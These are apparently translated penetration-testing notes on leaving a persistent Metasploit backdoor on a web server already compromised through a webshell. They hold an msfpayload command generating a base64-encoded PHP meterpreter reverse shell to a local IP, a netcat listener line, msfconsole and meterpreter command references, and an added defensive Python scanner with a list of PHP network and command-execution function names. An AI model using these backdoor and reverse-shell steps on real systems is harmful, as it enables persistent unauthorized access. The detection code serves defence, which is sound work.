1. Preparation
The scenario: we have already obtained a webshell and want to leave a backdoor behind. For this, msfpayload can be used together with msfconsole.
Start the PostgreSQL service: service postgresql start
Start the Metasploit service: service metasploit start
Start msfconsole: msfconsole
Check the database connection status: db_status
Generate the backdoor file:
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.133.128 LPORT=5555 R | msfencode -e php/base64 -t raw -o /root/Desktop/exp.php
exp.php still has to be wrapped in <?php ?> tags (the raw encoder output does not include them).
Start the listener on the attacking side
or
nc 192.168.133.128 -lvp 5555
Then request the backdoor file so that it connects back.
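What the step above leaves on the web server is a PHP file whose body is an eval(base64_decode(...)) wrapper, which is exactly what an integrity check of the web root should catch. The following is an added example (not part of the original notes, and not Metasploit code): a Python scanner that looks for that wrapper, peels nested base64 layers, and reports which network or command-execution functions show up inside. The sample PHP strings, the indicator list and the verdict labels are constructed for this illustration.

```python
import base64
import os
import re

# An eval(base64_decode(...)) wrapper; the base64 argument may be quoted
# or bare (bare is the shape the php/base64 encoder output takes).
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]?([A-Za-z0-9+/=\s]+)['\"]?\s*\)\s*\)",
    re.IGNORECASE,
)

# Function names that give a decoded layer network or command-execution
# capability. Constructed starter list; extend it for your environment.
INDICATORS = (
    "fsockopen", "socket_create", "stream_socket_client",
    "shell_exec", "proc_open", "passthru", "system", "exec",
)


def peel_layers(source, max_depth=5):
    """Follow eval(base64_decode(...)) wrappers inward; return the decoded layers."""
    layers = []
    current = source
    for _ in range(max_depth):
        match = EVAL_B64_RE.search(current)
        if not match:
            break
        raw = re.sub(r"\s", "", match.group(1))
        try:
            decoded = base64.b64decode(raw, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        layers.append(decoded)
        current = decoded
    return layers


def scan_php(source):
    """Classify one PHP source string and report what was found."""
    layers = peel_layers(source)
    innermost = layers[-1] if layers else source
    found = sorted(
        name for name in INDICATORS
        if re.search(r"\b" + re.escape(name) + r"\s*\(", innermost)
    )
    if layers:
        verdict = "high"      # eval of base64 is rarely legitimate in a web root
    elif found:
        verdict = "review"    # capability present in clear text; confirm by hand
    else:
        verdict = "clean"
    return {"layers": len(layers), "indicators": found, "verdict": verdict}


def scan_tree(root):
    """Walk a directory and return {path: report} for every .php file."""
    reports = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    reports[path] = scan_php(fh.read())
    return reports


def _wrap(php_code):
    """Build an eval(base64_decode(<bare base64>)) wrapper around php_code."""
    return "eval(base64_decode(" + base64.b64encode(php_code.encode()).decode() + "));"


# Constructed samples for the demonstration; the inner text is a fragment,
# not a working payload, and exists only to trip the indicator check.
SAMPLE_CLEAN = "<?php echo 'hello'; ?>"
_INNER = "$f = fsockopen($h, $p);"
SAMPLE_OBFUSCATED = "<?php " + _wrap(_INNER) + " ?>"
SAMPLE_NESTED = "<?php " + _wrap(_wrap(_INNER)) + " ?>"

if __name__ == "__main__":
    for label, sample in (("clean", SAMPLE_CLEAN),
                          ("obfuscated", SAMPLE_OBFUSCATED),
                          ("nested", SAMPLE_NESTED)):
        print(label, scan_php(sample))
```

Run scan_tree("/var/www/html") (or wherever the document root lives) on a schedule and diff the reports against a known-good baseline; a file that newly reports verdict "high" deserves a look at its decoded layers before anything else.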
2. How do we keep the sessions we obtain? First of all, msfconsole must be connected to the database.

exploit -h

    -e <opt>  The payload encoder to use. If none is specified, ENCODER is used.   (payload encoder; the default is used when none is given)
    -f        Force the exploit to run regardless of the value of MinimumRank.
    -h        Help banner.
    -j        Run in the context of a job.   (run in the background)
    -n <opt>  The NOP generator to use. If none is specified, NOP is used.
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The payload to use. If none is specified, PAYLOAD is used.
    -t <opt>  The target index to use. If none is specified, TARGET is used.
    -z        Do not interact with the session after successful exploitation   (put the established session in the background)

sessions -h

    -K        Terminate all sessions   (kill all sessions)
    -c <opt>  Run a command on the session given with -i, or all   (run a command)
    -d <opt>  Detach an interactive session
    -h        Help banner
    -i <opt>  Interact with the supplied session ID   (connect to a session)
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s <opt>  Run a script on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List verbose fields
3. Using meterpreter

Core Commands   (core commands)
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu   (show help)
    background                Backgrounds the current session   (send the session to the background)
    bgkill                    Kills a background meterpreter script   (kill a background meterpreter script)
    bglist                    Lists running background scripts   (list background meterpreter scripts)
    bgrun                     Executes a meterpreter script as a background thread   (run a script as a background thread)
    channel                   Displays information about active channels   (show active channels)
    close                     Closes a channel   (close a channel)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session   (exit)
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode   (open a Ruby shell)
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands   (file commands)
============================

    Command                   Description
    -------                   -----------
    cat                       Read the contents of a file to the screen
    cd                        Change directory
    download                  Download a file or directory
    edit                      Edit a file
    getlwd                    Print local working directory
    getwd                     Print working directory
    lcd                       Change local working directory
    lpwd                      Print local working directory
    ls                        List files
    mkdir                     Make directory
    pwd                       Print working directory
    rm                        Delete the specified file
    rmdir                     Remove directory
    search                    Search for files
    upload                    Upload a file or directory

Stdapi: Networking Commands   (network commands)
===========================

    Command                   Description
    -------                   -----------
    portfwd                   Forward a local port to a remote service   (port forwarding)

Example: portfwd add -l 5555 -p 3389 -r 192.168.198.129 forwards port 3389 of 192.168.198.129 to local port 5555.

Stdapi: System Commands
=======================

    Command                   Description
    -------                   -----------
    execute                   Execute a command   (run a command)
    getenv                    Get one or more environment variable values
    getpid                    Get the current process identifier
    getuid                    Get the user that the server is running as
    kill                      Terminate a process
    ps                        List running processes
    shell                     Drop into a system command shell   (spawn a shell)
    sysinfo                   Gets information about the remote system, such as OS   (show system information)
Appended: A first look at meterpreter